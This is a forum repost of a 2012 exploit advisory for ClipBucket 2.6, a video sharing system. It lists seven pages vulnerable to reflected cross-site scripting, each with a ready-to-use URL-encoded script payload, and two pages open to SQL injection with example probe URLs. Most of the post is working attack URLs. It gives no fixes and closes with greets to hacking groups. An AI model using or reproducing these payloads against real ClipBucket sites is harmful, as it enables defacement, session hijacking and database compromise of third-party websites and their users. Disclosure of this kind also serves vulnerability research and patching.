The_Arhitect Posted January 9, 2012 Report Posted January 9, 2012 # Exploit : Multiple Vulnerability on ClipBucket 2.6# Date : 09 January 2012# Author : YaDoY666# Website : http://yadoy666.serverisdown.org# Software : Clip Bucket (Open Source Video Sharing)# Version : 2.6# Vendor : Clip Bucket (http://clip-bucket.com)# Vendor Response : NoneCross Site Scripting====================[[=]] http://[site]/[path]/channels.php[[=]] http://[site]/[path]/collections.php[[=]] http://[site]/[path]/groups.php[[=]] http://[site]/[path]/search_result.php[[=]] http://[site]/[path]/videos.php[[=]] http://[site]/[path]/view_collection.php[[=]] http://[site]/[path]/view_item.phpExample :http://[site]/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_timehttp://[site]/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_timehttp://[site]/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_timehttp://[site]/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=http://[site]/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_timehttp://[site]/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3Ehttp://[site]/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3ESQL Injection==============[[=]] http://[site]/[path]/channels.php[[=]] http://[site]/[path]/videos.phpExample :http://[site]/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27http://[site]/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27Greets : KombezNux | Jack | X-Shadow | Don Tukulesto | GBlack | elv1n4 | GBlack | Kamtiez | n4ck0 | AaEzha | ServerIsDown | Indonesian Coder |source: exploit-db.com Quote